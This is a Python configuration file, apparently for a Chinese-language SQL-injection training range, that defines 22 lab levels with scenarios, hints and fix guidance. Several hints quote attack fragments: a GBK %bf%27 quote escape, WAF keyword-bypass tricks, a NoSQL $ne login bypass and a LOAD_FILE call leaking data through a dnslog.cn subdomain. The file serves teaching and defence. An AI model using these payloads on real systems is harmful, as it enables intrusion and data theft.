from __future__ import annotations

from collections import defaultdict

POSITION_ORDER = [
    "值上下文注入",
    "结构上下文注入",
    "语句级注入",
    "动态 SQL 注入",
    "插入位上下文注入",
    "Header / Cookie 上下文注入",
    "编码层注入",
]

OBSERVATION_ORDER = [
    "直接回显型",
    "报错型",
    "布尔盲注",
    "时间盲注",
    "带外潜力型",
    "带外型",
]

IMPACT_ORDER = [
    "认证绕过",
    "数据读取",
    "数据枚举",
    "数据篡改",
    "数据删除",
    "语句扩展",
    "错误修复对照",
    "文件读写",
    "WAF 绕过对照",
    "方言差异对照",
    "NoSQL 注入对照",
]

TIMING_ORDER = [
    "一次注入",
    "二次注入",
]

DATABASE_ORDER = [
    "MySQL / MariaDB",
    "PostgreSQL",
    "SQL Server",
    "Oracle",
    "SQLite",
]

LABS = [
    {
        "slug": "login-bypass",
        "title": "L01 登录网关绕过",
        "subtitle": "实战感最强的起点：从单条认证语句切入业务后台。",
        "difficulty": "基础",
        "story": "蓝队值班台的旧版认证门户仍在使用字符串拼接查询。",
        "endpoint": "/labs/sqli/login-bypass",
        "tables": ["users"],
        "position_class": "值上下文注入",
        "position_detail": "WHERE 字符串值 / 认证条件",
        "timing_class": "一次注入",
        "observation_class": "直接回显型",
        "impact_class": "认证绕过",
        "impact_detail": "改写认证逻辑，越过用户名密码校验。",
        "database_profiles": ["MySQL / MariaDB", "PostgreSQL", "SQL Server", "Oracle", "SQLite"],
        "teacher_path": "先讲值上下文，再讲认证逻辑如何被恒真条件改写。",
        "hints": [
            "先观察登录失败和成功的响应差异，确认是否存在布尔条件控制。",
            "注意用户名和密码是如何进入 WHERE 条件的，尝试让条件恒真。",
            "如果课堂上需要稳定演示，可先以 admin 账户为目标，再观察返回的角色字段。",
        ],
        "reset": "无需重置；该关卡默认只读。",
    },
    {
        "slug": "product-union",
        "title": "L02 商品检索 UNION 泄露",
        "subtitle": "模拟电商后台检索接口，被动输入框变成信息拼接器。",
        "difficulty": "基础",
        "story": "运营同学用商品模糊搜索查库存，但接口没有参数化。",
        "endpoint": "/labs/sqli/product-union",
        "tables": ["products", "lab_flags"],
        "position_class": "值上下文注入",
        "position_detail": "WHERE / LIKE 模糊查询值",
        "timing_class": "一次注入",
        "observation_class": "直接回显型",
        "impact_class": "数据读取",
        "impact_detail": "通过 UNION 扩展结果集，跨表读出额外数据。",
        "database_profiles": ["MySQL / MariaDB", "PostgreSQL", "SQL Server", "Oracle", "SQLite"],
        "teacher_path": "值上下文进入 WHERE，再引出 UNION 作为回显型取数方式。",
        "hints": [
            "先确认返回列数，再思考哪些列适合承接文本数据。",
            "留意页面最终渲染的是哪几列，数值列和文本列类型要兼容。",
            "敏感目标并不一定在 products 表里，课堂里可以尝试拼接其他表。",
        ],
        "reset": "无需重置；该关卡默认只读。",
    },
    {
        "slug": "error-ticket",
        "title": "L03 工单详情报错注入",
        "subtitle": "错误信息被原样回显，数据库异常直接变成信息通道。",
        "difficulty": "进阶",
        "story": "运维工单详情页为方便排障，直接把数据库报错展示给一线人员。",
        "endpoint": "/labs/sqli/error-ticket",
        "tables": ["support_tickets", "lab_flags"],
        "position_class": "值上下文注入",
        "position_detail": "WHERE 数值值 / 详情 id",
        "timing_class": "一次注入",
        "observation_class": "报错型",
        "impact_class": "数据枚举",
        "impact_detail": "通过数据库异常把结构信息或目标数据拼进错误消息。",
        "database_profiles": ["MySQL / MariaDB", "PostgreSQL", "SQL Server", "Oracle"],
        "teacher_path": "讲数值上下文不依赖引号，再引出详细错误回显的危险。",
        "hints": [
            "观察 id 参数是否处于数字上下文。",
            "当语句本身执行出错时，页面是否把数据库异常完整展示了出来？",
            "如果能让数据库在错误字符串里拼接查询结果，就能实现报错外带。",
        ],
        "reset": "无需重置；该关卡默认只读。",
    },
    {
        "slug": "employee-blind",
        "title": "L04 门禁查询布尔盲注",
        "subtitle": "页面只告诉你“存在 / 不存在”，但这已经足够。",
        "difficulty": "进阶",
        "story": "访客登记系统隐藏了员工详情，只保留门禁编号存在性判断。",
        "endpoint": "/labs/sqli/employee-blind",
        "tables": ["employees", "lab_flags"],
        "position_class": "值上下文注入",
        "position_detail": "WHERE 字符串值 / 存在性判断",
        "timing_class": "一次注入",
        "observation_class": "布尔盲注",
        "impact_class": "数据枚举",
        "impact_detail": "借真假响应逐位枚举数据库信息。",
        "database_profiles": ["MySQL / MariaDB", "PostgreSQL", "SQL Server", "Oracle", "SQLite"],
        "teacher_path": "讲“没有数据回显，不等于没有数据通道”。",
        "hints": [
            "页面不回显字段值，但会回显真假。真假本身就是侧信道。",
            "尝试构造一个原本不存在的 badge，再用 AND / OR 改写条件。",
            "逐位猜解时，先从数据库名、用户、固定 flag 前缀这类稳定目标入手。",
        ],
        "reset": "无需重置；该关卡默认只读。",
    },
    {
        "slug": "shipping-time",
        "title": "L05 物流接口时间盲注",
        "subtitle": "响应包没有泄露数据，但时间差会说话。",
        "difficulty": "进阶",
        "story": "物流客服接口只回“状态是否可见”，却把延时原样暴露给前端。",
        "endpoint": "/labs/sqli/shipping-time",
        "tables": ["orders", "lab_flags"],
        "position_class": "值上下文注入",
        "position_detail": "WHERE 字符串值 / 订单号",
        "timing_class": "一次注入",
        "observation_class": "时间盲注",
        "impact_class": "数据枚举",
        "impact_detail": "利用时间侧信道探测真假条件。",
        "database_profiles": ["MySQL / MariaDB", "PostgreSQL", "SQL Server", "Oracle"],
        "teacher_path": "讲侧信道，把“看不到结果”升级为“照样能探测条件真假”。",
        "hints": [
            "先基线测试正常请求耗时，再对比异常延时。",
            "如果数据库支持 sleep 一类函数，真假条件可以映射成时间差。",
            "课堂上建议先猜数据库名首字符，便于学生快速看到时间变化。",
        ],
        "reset": "无需重置；该关卡默认只读。",
    },
    {
        "slug": "report-stacked",
        "title": "L06 审计报表堆叠查询",
        "subtitle": "一次请求，多条语句，影响面从读扩大到改。",
        "difficulty": "高级",
        "story": "旧版报表导出为了兼容历史脚本，数据库连接开启了 multi-statements。",
        "endpoint": "/labs/sqli/report-stacked",
        "tables": ["audit_logs", "grades"],
        "position_class": "语句级注入",
        "position_detail": "SELECT 查询被扩展为多语句执行",
        "timing_class": "一次注入",
        "observation_class": "直接回显型",
        "impact_class": "语句扩展",
        "impact_detail": "从单条查询升级为额外 UPDATE / DELETE / INSERT。",
        "database_profiles": ["MySQL / MariaDB", "SQL Server"],
        "teacher_path": "先讲查询语句，再讲驱动开启 multi-statements 后的放大效应。",
        "hints": [
            "观察驱动是否允许一条输入触发多条 SQL。",
            "如果第一条语句只是查询，第二条语句就可能是更新、删除或插入。",
            "验证影响时，优先改可恢复的数据表，例如 grades。",
        ],
        "reset": "使用 /scripts/reset_lab.sh report-stacked 恢复相关数据。",
    },
    {
        "slug": "second-order",
        "title": "L07 二次注入：保存筛选器",
        "subtitle": "第一次输入看似安全，真正的注入发生在稍后的后台报表。",
        "difficulty": "高级",
        "story": "分析师可以保存常用部门筛选条件，报表页会复用它生成 SQL。",
        "endpoint": "/labs/sqli/second-order",
        "tables": ["saved_filters", "employees", "lab_flags"],
        "position_class": "动态 SQL 注入",
        "position_detail": "数据库中存储值被二次拼回 WHERE 条件",
        "timing_class": "二次注入",
        "observation_class": "直接回显型",
        "impact_class": "数据读取",
        "impact_detail": "保存的 payload 在后续动态报表中被重新解释。",
        "database_profiles": ["MySQL / MariaDB", "PostgreSQL", "SQL Server", "Oracle", "SQLite"],
        "teacher_path": "讲生命周期：第一次输入存储，第二次读取拼接才真正触发。",
        "hints": [
            "先找“存储用户输入”的位置，再找“重新使用该输入”的位置。",
            "注意第一次写入可能是安全的，第二次读取拼接才是漏洞触发点。",
            "课堂上可把 payload 保存后再去报表页触发，帮助学生理解生命周期。",
        ],
        "reset": "使用 /scripts/reset_lab.sh second-order 清空已保存的筛选器。",
    },
    {
        "slug": "leaderboard-sort",
        "title": "L08 排行榜排序 / LIMIT 注入",
        "subtitle": "不仅值要校验，列名、方向、分页参数也必须白名单。",
        "difficulty": "进阶",
        "story": "教务排行页允许前端自定义排序字段和展示数量。",
        "endpoint": "/labs/sqli/leaderboard-sort",
        "tables": ["grades"],
        "position_class": "结构上下文注入",
        "position_detail": "ORDER BY / ASC-DESC / LIMIT 结构位",
        "timing_class": "一次注入",
        "observation_class": "直接回显型",
        "impact_class": "数据枚举",
        "impact_detail": "通过排序表达式和分页位影响查询结构。",
        "database_profiles": ["MySQL / MariaDB", "PostgreSQL", "SQL Server", "Oracle", "SQLite"],
        "teacher_path": "这关专门讲“不是值位，参数化不够，必须白名单”。",
        "hints": [
            "ORDER BY 后面通常不是字符串字面量，而是列名或表达式。",
            "如果开发者直接拼接 sort / dir / limit，这里仍然可能注入。",
            "修复时不能用占位符绑定列名，必须做严格白名单。",
        ],
        "reset": "无需重置；该关卡默认只读。",
    },
    {
        "slug": "grade-editor",
        "title": "L09 成绩调整 UPDATE 注入",
        "subtitle": "SQL 注入不只会“读”，也会直接改业务数据。",
        "difficulty": "进阶",
        "story": "班主任补分工具允许输入加分表达式和评语。",
        "endpoint": "/labs/sqli/grade-editor",
        "tables": ["grades"],
        "position_class": "语句级注入",
        "position_detail": "UPDATE 的 SET / WHERE 子句",
        "timing_class": "一次注入",
        "observation_class": "直接回显型",
        "impact_class": "数据篡改",
        "impact_detail": "将单条更新放大为批量或任意修改。",
        "database_profiles": ["MySQL / MariaDB", "PostgreSQL", "SQL Server", "Oracle", "SQLite"],
        "teacher_path": "从读漏洞过渡到写漏洞，强调业务完整性破坏。",
        "hints": [
            "关注 SET 子句和 WHERE 子句是否都由用户输入拼接。",
            "一旦 WHERE 可以被改写，影响范围就可能从单条记录扩展到整表。",
            "修复时别只绑定 student_no，也要限制 bonus 的类型和 remark 的长度。",
        ],
        "reset": "使用 /scripts/reset_lab.sh grade-editor 恢复成绩数据。",
    },
    {
        "slug": "api-json-sqli",
        "title": "L10 JSON API 参数注入",
        "subtitle": "前端换成 JSON body，不等于注入风险自动消失。",
        "difficulty": "进阶",
        "story": "客服查询订单的接口升级成 JSON，但后端仍旧拼接 SQL。",
        "endpoint": "/labs/sqli/api-json-sqli",
        "tables": ["orders", "lab_flags"],
        "position_class": "值上下文注入",
        "position_detail": "WHERE / LIKE + 数值比较，输入来自 JSON body",
        "timing_class": "一次注入",
        "observation_class": "直接回显型",
        "impact_class": "数据读取",
        "impact_detail": "JSON 只是载体，值进入 SQL 后依旧能改写查询。",
        "database_profiles": ["MySQL / MariaDB", "PostgreSQL", "SQL Server", "Oracle", "SQLite"],
        "teacher_path": "把页面表单场景扩展到 API，统一“输入就是输入”的认知。",
        "hints": [
            "观察 JSON 字段最终进入了哪些比较条件。",
            "数值字段如果直接拼接，同样可以成为注入点。",
            "前端有个内置请求面板，课堂上可以用它展示 API 层注入。",
        ],
        "reset": "无需重置；该关卡默认只读。",
    },
    {
        "slug": "faux-fix",
        "title": "L11 伪修复：黑名单过滤",
        "subtitle": "把关键字 replace 掉，不代表真正安全。",
        "difficulty": "基础",
        "story": "某开发以为把 union / select / or 替换为空串就安全了。",
        "endpoint": "/labs/sqli/faux-fix",
        "tables": ["users"],
        "position_class": "值上下文注入",
        "position_detail": "WHERE 字符串值 + 黑名单伪修复",
        "timing_class": "一次注入",
        "observation_class": "直接回显型",
        "impact_class": "错误修复对照",
        "impact_detail": "演示“过滤关键字”并没有修复语法边界。",
        "database_profiles": ["MySQL / MariaDB", "PostgreSQL", "SQL Server", "Oracle", "SQLite"],
        "teacher_path": "用于课程收束：为什么伪修复不可靠，为什么要回到边界控制。",
        "hints": [
            "先想想这个过滤器覆盖了哪些关键字、哪些没覆盖。",
            "SQL 里实现“恒真”的写法不止一种。",
            "课程重点不是找最花哨 payload，而是让学生理解黑名单为什么不可靠。",
        ],
        "reset": "无需重置；该关卡默认只读。",
    },
    {
        "slug": "orm-misuse",
        "title": "L12 ORM 误用",
        "subtitle": "用了 ORM / text() 也照样可能被 f-string 打回原形。",
        "difficulty": "进阶",
        "story": "团队逐步迁移到 SQLAlchemy，但有些查询仍然手写 SQL。",
        "endpoint": "/labs/sqli/orm-misuse",
        "tables": ["products", "lab_flags"],
        "position_class": "动态 SQL 注入",
        "position_detail": "ORM text()/raw SQL 中的动态字符串拼接",
        "timing_class": "一次注入",
        "observation_class": "直接回显型",
        "impact_class": "数据读取",
        "impact_detail": "框架调用点并没有阻止用户输入改变原始 SQL。",
        "database_profiles": ["MySQL / MariaDB", "PostgreSQL", "SQL Server", "Oracle", "SQLite"],
        "teacher_path": "讲“用了 ORM”≠“没有 SQLi”，关键仍是是否绑定参数。",
        "hints": [
            "观察 ORM 是否真的在“绑定参数”，还是只是帮你执行了一段字符串。",
            "text() 不是问题，问题是 text() 里塞进去的内容怎么来的。",
            "课堂上可把它和前面的 UNION 检索关卡对照讲。",
        ],
        "reset": "无需重置；该关卡默认只读。",
    },
    {
        "slug": "insert-register",
        "title": "L13 注册接口 INSERT 注入",
        "subtitle": "INSERT 语句的字段值同样可以被拼接，影响远不止注册本身。",
        "difficulty": "进阶",
        "story": "新生注册接口为方便埋点把 invite_source 字段做了字符串拼接。",
        "endpoint": "/labs/sqli/insert-register",
        "tables": ["register_users", "users"],
        "position_class": "插入位上下文注入",
        "position_detail": "INSERT INTO ... VALUES (..., '<user_input>')",
        "timing_class": "一次注入",
        "observation_class": "直接回显型",
        "impact_class": "数据篡改",
        "impact_detail": "通过 INSERT 字段拼接附加列，甚至改写其它行的 role。",
        "database_profiles": ["MySQL / MariaDB", "PostgreSQL", "SQL Server"],
        "teacher_path": "把注入位从 SELECT 扩展到 INSERT，强调“写入语句同样要参数化”。",
        "hints": [
            "看 invite_source 是不是直接进入 INSERT 的 VALUES 列表。",
            "可以尝试用括号闭合 + 多组 VALUES 一次插入额外行。",
            "若数据库支持 INSERT...SELECT，还能跨表把目标数据搬到自己的注册记录里。",
        ],
        "reset": "使用 ./scripts/reset_lab.sh sqli-register 恢复注册表。",
    },
    {
        "slug": "delete-cleanup",
        "title": "L14 清理任务 DELETE 注入",
        "subtitle": "DELETE 的 WHERE 子句被拼接，会让一次清理任务波及无关数据。",
        "difficulty": "高级",
        "story": "运维清理面板按 token 清理过期记录，WHERE 条件直接拼接。",
        "endpoint": "/labs/sqli/delete-cleanup",
        "tables": ["cleanup_jobs"],
        "position_class": "语句级注入",
        "position_detail": "DELETE FROM ... WHERE expire_token = '<user_input>'",
        "timing_class": "一次注入",
        "observation_class": "直接回显型",
        "impact_class": "数据删除",
        "impact_detail": "用 OR 1=1 把整张表清空，或精准删除特定行。",
        "database_profiles": ["MySQL / MariaDB", "PostgreSQL", "SQL Server", "SQLite"],
        "teacher_path": "强调“删除类语句的 WHERE 拼接会造成不可逆破坏”，引出审计与最小权限。",
        "hints": [
            "先看 token 是怎么进入 DELETE WHERE 的。",
            "把 token 换成恒真条件，观察影响行数变化。",
            "教学环境可恢复，真实业务里这一步可能造成数据丢失。",
        ],
        "reset": "使用 ./scripts/reset_lab.sh sqli-cleanup 恢复清理任务表。",
    },
    {
        "slug": "header-audit",
        "title": "L15 User-Agent 审计 Header 注入",
        "subtitle": "请求头同样是用户输入，进入 SQL 时风险等同于 query 参数。",
        "difficulty": "进阶",
        "story": "访问审计中间件直接把 User-Agent 拼进 INSERT/SELECT。",
        "endpoint": "/labs/sqli/header-audit",
        "tables": ["audit_access_logs"],
        "position_class": "Header / Cookie 上下文注入",
        "position_detail": "User-Agent 进入 INSERT VALUES 与 SELECT WHERE",
        "timing_class": "一次注入",
        "observation_class": "直接回显型",
        "impact_class": "数据读取",
        "impact_detail": "改写后续审计查询，借 UNION 跨表读出数据。",
        "database_profiles": ["MySQL / MariaDB", "PostgreSQL"],
        "teacher_path": "纠正“只关注 query/form”的认知盲点：Header 也是输入。",
        "hints": [
            "用 curl/Burp 改 User-Agent，把 SQL 元字符塞进去。",
            "审计页接着会查询当前 UA 的历史，可形成回显。",
            "现实里 X-Forwarded-For、Referer 同样常见。",
        ],
        "reset": "使用 ./scripts/reset_lab.sh sqli-audit 重置审计日志。",
    },
    {
        "slug": "cookie-theme",
        "title": "L16 主题偏好 Cookie 注入",
        "subtitle": "Cookie 的可控性常被低估，进入 SQL 后效果与 query 注入一致。",
        "difficulty": "进阶",
        "story": "旧版主题切换器从 cookie `theme` 读取偏好并查询主题表。",
        "endpoint": "/labs/sqli/cookie-theme",
        "tables": ["theme_preferences"],
        "position_class": "Header / Cookie 上下文注入",
        "position_detail": "Cookie theme 进入 WHERE theme_code = '<user_input>'",
        "timing_class": "一次注入",
        "observation_class": "布尔盲注",
        "impact_class": "数据读取",
        "impact_detail": "通过 cookie 注入读出隐藏主题中的敏感字段。",
        "database_profiles": ["MySQL / MariaDB", "PostgreSQL", "SQL Server", "SQLite"],
        "teacher_path": "把注入面从 URL/表单扩展到所有客户端可控渠道。",
        "hints": [
            "在浏览器 DevTools 修改 cookie `theme` 再刷新。",
            "由于隐藏主题的 is_active=0，需要让 SQL 同时返回 active 与 hidden。",
            "也可以用 UNION 直接把 theme_label 字段拼进结果。",
        ],
        "reset": "使用 ./scripts/reset_lab.sh sqli-theme 重置主题表。",
    },
    {
        "slug": "wide-byte",
        "title": "L17 GBK 宽字节注入",
        "subtitle": "addslashes 加的反斜杠遇到 GBK 多字节会被'吃掉'。",
        "difficulty": "高级",
        "story": "校史馆资料库沿用 GBK 编码，开发用 addslashes 自以为'安全'。",
        "endpoint": "/labs/sqli/wide-byte",
        "tables": ["gbk_legacy_articles"],
        "position_class": "编码层注入",
        "position_detail": "GBK + addslashes（反斜杠被高位字节吞掉）",
        "timing_class": "一次注入",
        "observation_class": "直接回显型",
        "impact_class": "数据读取",
        "impact_detail": "宽字节配合 UNION 读取 secret_tag 字段。",
        "database_profiles": ["MySQL / MariaDB"],
        "teacher_path": "讲清编码层防御为何脆弱，引出统一字符集 + 真正参数化。",
        "hints": [
            "观察响应里反斜杠是否被合并进了一个汉字。",
            "经典 payload 是 0xbf 0x27（%bf%27）让单引号逃逸出来。",
            "修复要点是统一字符集为 utf8mb4，并改用真正的参数绑定。",
        ],
        "reset": "无需重置；该关卡默认只读。",
    },
    {
        "slug": "waf-blacklist-bypass",
        "title": "L18 WAF 黑名单综合绕过",
        "subtitle": "替换关键字、URL 编码、HTTP 参数污染——黑名单永远追不上 payload。",
        "difficulty": "高级",
        "story": "网关装了一个'土法 WAF'：删空格、删 union、删 select、删注释。",
        "endpoint": "/labs/sqli/waf-blacklist-bypass",
        "tables": ["products", "lab_flags"],
        "position_class": "值上下文注入",
        "position_detail": "WHERE LIKE 模糊检索 + 自研黑名单 WAF",
        "timing_class": "一次注入",
        "observation_class": "直接回显型",
        "impact_class": "WAF 绕过对照",
        "impact_detail": "演示 6 种绕过套路：内联注释、双写、大小写、URL 二次编码、HPP、Unicode。",
        "database_profiles": ["MySQL / MariaDB"],
        "teacher_path": "把'伪修复'升级为'伪 WAF'，让学生看到黑名单的工程性脆弱。",
        "hints": [
            "先观察响应里 payload 被改成了什么样，反推过滤规则。",
            "MySQL 内联注释 /*!50000SELECT*/ 在某些版本里仍可执行。",
            "双写关键字（uniounionon）和大小写混淆是最经典的两招。",
        ],
        "reset": "无需重置；该关卡默认只读。",
    },
    {
        "slug": "file-rw-outfile",
        "title": "L19 高权限读写：load_file / INTO OUTFILE",
        "subtitle": "当 DB 账号拥有 FILE 权限时，SQLi 不再只是'查数据'。",
        "difficulty": "高级",
        "story": "运维误用 root 账号给 web 服务，靶场内可演示文件读写但出口被限制。",
        "endpoint": "/labs/sqli/file-rw-outfile",
        "tables": ["products", "file_io_attempts"],
        "position_class": "值上下文注入",
        "position_detail": "UNION 子查询使用 LOAD_FILE() / SELECT ... INTO OUTFILE",
        "timing_class": "一次注入",
        "observation_class": "直接回显型",
        "impact_class": "文件读写",
        "impact_detail": "读 /etc/hostname 类无害文件、写文件到 /tmp/lab/。",
        "database_profiles": ["MySQL / MariaDB"],
        "teacher_path": "讲'权限最小化'：FILE 权限是真实业务里的高危授予。",
        "hints": [
            "先确认数据库账号是否拥有 FILE 权限。",
            "LOAD_FILE() 只能读 secure_file_priv 允许的目录。",
            "INTO OUTFILE 在容器内只能写到 /tmp/lab/，且不能覆盖。",
        ],
        "reset": "使用 ./scripts/reset_lab.sh sqli-fileio 清理 /tmp/lab/ 与日志。",
    },
    {
        "slug": "oob-dnslog",
        "title": "L20 带外回显：DNSLog 模拟",
        "subtitle": "无回显场景下，把数据塞进 DNS 子域名外带是经典套路。",
        "difficulty": "高级",
        "story": "靶场内置 /api/sqli/dnslog/recv 接收端，模拟外部 DNSLog 通道。",
        "endpoint": "/labs/sqli/oob-dnslog",
        "tables": ["users", "dnslog_callbacks"],
        "position_class": "值上下文注入",
        "position_detail": "无回显查询 + UDF/LOAD_FILE 触发 DNS 解析（教学用 mock）",
        "timing_class": "一次注入",
        "observation_class": "带外型",
        "impact_class": "数据枚举",
        "impact_detail": "通过子域名携带数据回传，绕过无回显限制。",
        "database_profiles": ["MySQL / MariaDB"],
        "teacher_path": "把'盲注'升级为'带外'，强调真实环境里的 DNSLog/Burp Collaborator 思路。",
        "hints": [
            "无回显时不要硬猜，找通道：HTTP/DNS/SMB 都行。",
            "本关 mock 了 DNSLog，用 /api/sqli/dnslog/recv?sub=<data> 直接 GET/POST 即可。",
            "真实环境通常借 LOAD_FILE('\\\\\\\\<sub>.dnslog.cn\\\\x') 触发 DNS 查询。",
        ],
        "reset": "使用 ./scripts/reset_lab.sh sqli-dnslog 清空回调记录。",
    },
    {
        "slug": "nosql-style",
        "title": "L21 NoSQL 风格注入：$ne / $regex",
        "subtitle": "MongoDB 不写 SQL，但参数处理不当一样会被注入。",
        "difficulty": "进阶",
        "story": "新版用户中心改用 MongoDB 风格的查询语法（用 MariaDB JSON 模拟）。",
        "endpoint": "/labs/sqli/nosql-style",
        "tables": ["nosql_docs"],
        "position_class": "动态 SQL 注入",
        "position_detail": "JSON body 中的 password 字段被解释为 {$ne: ''} 操作符",
        "timing_class": "一次注入",
        "observation_class": "直接回显型",
        "impact_class": "NoSQL 注入对照",
        "impact_detail": "用 $ne / $gt / $regex 实现登录绕过和数据枚举。",
        "database_profiles": ["MongoDB（用 MariaDB JSON 模拟）"],
        "teacher_path": "纠正'用了 NoSQL 就没注入'的误区，本质都是输入信任问题。",
        "hints": [
            "把 password 字段改成 {\"$ne\":\"\"} 或 {\"$ne\":null}。",
            "服务端如果直接把 JSON 对象塞进查询条件，就构造了注入。",
            "修复要点：强制 password 必须是字符串类型，再做参数化比较。",
        ],
        "reset": "无需重置；该关卡默认只读。",
    },
    {
        "slug": "dialect-diff",
        "title": "L22 数据库方言差异速查",
        "subtitle": "同一个 SQLi 思路，到了不同 DB 上 payload 完全不同。",
        "difficulty": "进阶",
        "story": "教研室整理了一份各家 DB 的等价函数，提供给学员快速查阅。",
        "endpoint": "/labs/sqli/dialect-diff",
        "tables": ["dialect_samples"],
        "position_class": "值上下文注入",
        "position_detail": "WHERE dialect_name = '<input>'（用于检索方言示例）",
        "timing_class": "一次注入",
        "observation_class": "直接回显型",
        "impact_class": "方言差异对照",
        "impact_detail": "本身是知识查阅页，但检索框仍存在注入，演示'文档页也要参数化'。",
        "database_profiles": ["MySQL / MariaDB", "PostgreSQL", "SQL Server", "Oracle", "SQLite"],
        "teacher_path": "课程收尾页：把前 21 关学到的 payload 跨方言对照一遍。",
        "hints": [
            "先用 dialect 字段过滤，再观察检索框是否参数化。",
            "MySQL 的 SLEEP() 在 PG 是 pg_sleep()，在 MSSQL 是 WAITFOR DELAY。",
            "字符串拼接：MySQL 用 CONCAT，PG/Oracle/SQLite 用 ||，MSSQL 用 +。",
        ],
        "reset": "无需重置；该关卡默认只读。",
    },
]


for lab in LABS:
    lab.setdefault("domain", "sqli")
    lab.setdefault("primary_class", lab.get("position_class", "值上下文注入"))
    lab.setdefault("secondary_class", lab.get("observation_class", lab.get("impact_class", "直接回显型")))
    lab.setdefault("defense_focus", "参数化 / 白名单 / 最小权限")
    lab.setdefault("surfaces", lab.get("tables", []))

LAB_INDEX = {item["slug"]: item for item in LABS}


def get_lab(slug: str):
    return LAB_INDEX[slug]


def _group_by(items: list[dict], key: str, order: list[str]):
    grouped = defaultdict(list)
    for item in items:
        grouped[item[key]].append(item)
    result = []
    for group_name in order:
        if grouped[group_name]:
            result.append({"name": group_name, "labs": grouped[group_name]})
    return result


def build_taxonomy() -> dict:
    return {
        "position_groups": _group_by(LABS, "position_class", POSITION_ORDER),
        "observation_groups": _group_by(LABS, "observation_class", OBSERVATION_ORDER),
        "impact_groups": _group_by(LABS, "impact_class", IMPACT_ORDER),
        "timing_groups": _group_by(LABS, "timing_class", TIMING_ORDER),
        "database_profiles": DATABASE_ORDER,
        "counts": {
            "positions": len({item["position_class"] for item in LABS}),
            "observations": len({item["observation_class"] for item in LABS}),
            "impacts": len({item["impact_class"] for item in LABS}),
            "timings": len({item["timing_class"] for item in LABS}),
        },
    }
